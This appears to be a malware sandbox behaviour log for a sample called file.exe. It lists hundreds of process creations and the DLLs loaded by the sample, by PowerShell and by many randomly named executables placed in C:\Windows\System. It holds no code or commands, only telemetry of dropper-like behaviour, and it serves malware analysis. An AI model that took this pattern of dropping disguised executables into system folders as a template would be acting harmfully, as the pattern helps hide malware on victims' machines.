Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mshtml.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msiso.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ieframe.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mlang.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: d2d1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dwrite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: d3d11.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dxcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: imgutil.dll
Source: C:\Windows\System\xIpouRJ.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\xIpouRJ.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\ERbKWDm.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\ERbKWDm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\wHnuprt.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\wHnuprt.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\uxMRJKa.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\uxMRJKa.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\bJVoOik.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\bJVoOik.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\wkazDeV.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\wkazDeV.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\VWrcuzM.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\VWrcuzM.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\wJNkgSa.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\wJNkgSa.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\imwRXsl.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\imwRXsl.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\bzSbRdi.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\bzSbRdi.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\Csmwgyb.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\Csmwgyb.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\defQfgC.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\defQfgC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\XZxtJFw.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\XZxtJFw.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\MwFvbxc.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\MwFvbxc.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\hAOVVjq.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\hAOVVjq.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\oxCQuSo.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\oxCQuSo.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\vyHGCnK.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\vyHGCnK.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\mbSqRHL.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\mbSqRHL.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\VFkciqc.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\VFkciqc.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\sdTevgk.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\sdTevgk.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\eVVPPqR.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\eVVPPqR.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\VHwkuIa.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\VHwkuIa.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\WLWcTVM.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\WLWcTVM.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\WCbcoxD.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\WCbcoxD.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\QWtCxan.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\QWtCxan.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\fpHmIIc.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\fpHmIIc.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\FGSooXz.exe	Section loaded: apphelp.dll
